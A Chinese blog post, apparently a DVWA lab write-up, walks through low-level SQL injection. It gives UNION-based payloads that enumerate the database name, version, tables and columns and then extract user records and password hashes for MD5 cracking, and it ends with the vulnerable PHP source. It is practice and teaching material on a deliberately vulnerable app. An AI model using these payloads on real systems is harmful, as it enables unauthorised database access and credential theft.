【DVWA】SQL Injection-----------------------low

最新推荐文章于 2023-12-14 14:02:41 发布
最新推荐文章于 2023-12-14 14:02:41 发布
阅读量354 收藏
点赞数 1
分类专栏: sql注入 文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/114106697
版权

【DVWA】SQL Injection-----------------------low

1、初步测试

输入单引号报错

输入' and 1=1#回显正常,说明存在sql注入

输入' or 1=1#,遍历出数据库内容:

image-20210225134225933

用order by测出主查询为两个字段

2、获取数据库名、用户名、版本

用union语句查询数据库名和用户名:

payload_1:' union select database(),user()#

image-20210225134617266

payload_2:' union select 1,concat_ws('~',database(),user(),version())#

分析:用concat()函数可以将多个查询结果拼接成一串;concat_ws()可以直接指定分隔符;优点是使用concat()或concat_ws()函数可以仅占用一个查询字段就返回多个结果,效率很高

image-20210225200220793

得到数据库名为dvwa,用户名为root@localhost版本号为5.7.26

3、获取表名

查询dvwa数据库中的表名:

' union select table_schema,table_name from information_schema.tables where table_schema='dvwa'#

image-20210225135019289

结果报出了这个错误,说是这个union操作非法,上网查了很多资料说是union两端查询的字段的排序规则不同问题解决

问题解决后,继续测试:

payload1:1' and 1=2 union select 1,group_concat(table_name) from information_schema.columns where table_schema='dvwa'#

分析:这里的and 1=2是为了屏蔽主查询的结果回显,使得回显点输出的敏感字符更多,或者减少干扰项

image-20210225201757435

获取的表名为guestbook,users。

4、获取列名

payload2:1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

分析:这里的group_concat()函数作用是将column_name查询出来的内容拼接在一块(用,隔开),在回显点只允许输出一行的情况下,这种方法效率更高。

image-20210225201424718

5、获取user与password

payload_1:1' and 1=2 union select group_concat(user_id,first_name,last_name),group_concat(password) from users#

image-20210225204331013

payload_2:1' and 1=2 union select concat(user_id,first_name,last_name),1 from users#

image-20210225205635147

注:concat()函数是将所有元素查询的结果拼接在一块,一次只能显示一次的遍历结果

group_concat()函数是将所有元素查询的结果拼接在一块,将每次遍历的结果用‘,’隔开

6、暴力破解密码

搜索md5在线破解工具:

image-20210225210050540

源码分析:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; //此处没有过滤或预处理,直接拼接到sql语句中,存在sql注入漏洞
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
0ak1ey
关注
专栏目录
DVWA-sql注入
Darklord.W
04-09 395
sql注入低中高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
DVWA】--- 七、sql注入(SQL Injection)
qq_43168364的博客
05-31 441
SQL Injection 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 首先判断注入点 由回显可知注入点就在输入框中,也可以在URL中进行注入。接下来判断注入类型。另id=1’ 根据回显判断有可能是字符型注入点,使用and进行闭合看看是否是字符型注入点。 闭合后回显正常就是字符型注入点,这里尝试使用联合查询进行进行注入,首先判断它的字段数。 二、Medium级别 三、High级别 四、Impossible级别
DVWA笔记(一)SQL InjectionSQL注入
weixin_45868644的博客
08-20 458
文章目录SQL注入原理前言1.注入流程2.源码分析2.复现过程总结 SQL注入原理 Web应用程序对用户输入的合法性没有判断或者过滤不严,用户在输入的字符串之中注入SQL指令,导致这些注入进去的恶意指令被数据库误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 前言 重点:information_schema 在学习SQL注入漏洞之前,先学习一个相关的知识点。在MySQL 5.0版本之后,MySQL默认在数据库中存放一个“information_schema”的数据库,在该库中,需要记住三个表名,分别
DVWA实验-sql显注
Ping_Pig的博客
09-14 661
基础知识要打牢:什么是sql注入 sql注入的测试流程: 判断是否存在注入,注入的类型 获取数据库版本信息,用户等 猜解当前数据库名称 猜解数据库中的表名 猜解表中的字段名 猜解表中的字段值 验证字段的有效性 我们遇到了一个让人怀疑的输入框,根据做安全的敏感神经,我们怀疑框里会有注入,于是我们插入了我们输入的恶意字符,那么恶意字符有哪些呢?什么是...
DVWASQL Injection
xxxxxxx45678的博客
11-08 605
SQL注入学习
DVWASQL Injection的全难度
m0_74456293的博客
01-28 245
DVWASQL Injection的全难度
2020-12-06-DVWAsql.md
01-24
#### 三、案例分析:低级别(Low Level)SQL Injection 在给定的代码片段中,可以看到一个简单的PHP脚本,该脚本接收用户输入的`id`参数,并直接将其嵌入到SQL查询语句中,没有任何过滤或转义处理。这正是导致SQL...
DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 788
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2882
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 882
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
DVWA靶场
nidaxin的博客
01-29 2765
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
sqlmap dvwa注入测试
weixin_45774059的博客
06-05 311
带上cookie爆出数据库 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# " --cookie="security=low; PHPSESSID=6tuf1mkr1snkgcgdi0e4gaiam9 " --dbs 列出当前数据库的详细信息 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities...
DVWA靶机
qq_53616768的博客
08-13 271
生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码。生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码。输入1,将网址复制到sqlmap,同时抓包burp,将cookie复制到sqlmap。修改文件后缀,在上传是用burp抓包,并将后缀名修改回来。修改文件后缀,在上传是用burp抓包,并将后缀名修改回来。...
欢迎来到训练场,SQL注入DVWA靶机
sinat_35855737的博客
05-11 1277
手把手带你飞,在DVWA靶机上练习sql注入
SQL学习之路--DVWA等级LOW
m0_69555575的博客
06-17 540
一名想进入安全行业的普通青年
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1930
【实训04】数据库SQL注入漏洞
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1319
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
6.sql injection之获取当前数据库的表名-------小白笔记
qwsn
11-03 4060
1.版本在5.0及以上的mysql服务器特点: ①内置数据字典表:information_schema.tables ②该表:存储了所有数据库里的所有表的信息 //注意,information_schema.tables这个表,是存储所有数据库中的所有表信息,所以要加上where语句,才可以限制为当前的数据库dvwa 2.group_concat()函数,显示多表的名称 3.爆表过程: ①源码...
DVWAsql注入的操作指南
discover2210212455的博客
09-16 3607
DVWAsql注入的操作指南 学习渗透测试,一定要掌握各种漏洞的检测和利用方法。今天我们分析一下dvwa环境中sql注入从低级到高级的渗透步骤。 手动挖掘Sql注入,首先要发现注入点。以low级别为例,发现一个可以输入内容的文本框时,首先测试一下是不是存在sql注入Low Level 分别在文本框中输入1和1’进行测试。输入1时,回显正常,如下:   输入1’时,提示错误。此...
DVWAsqli-labs的区别
最新发布
04-17
DVWA(Damn Vulnerable Web Application)和sqli-labs(SQL Injection Labs)都是用于学习和测试网络安全的漏洞应用程序。它们的区别在于以下几个方面: 1. 目的:DVWA是一个包含多种不同类型漏洞的Web应用程序,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值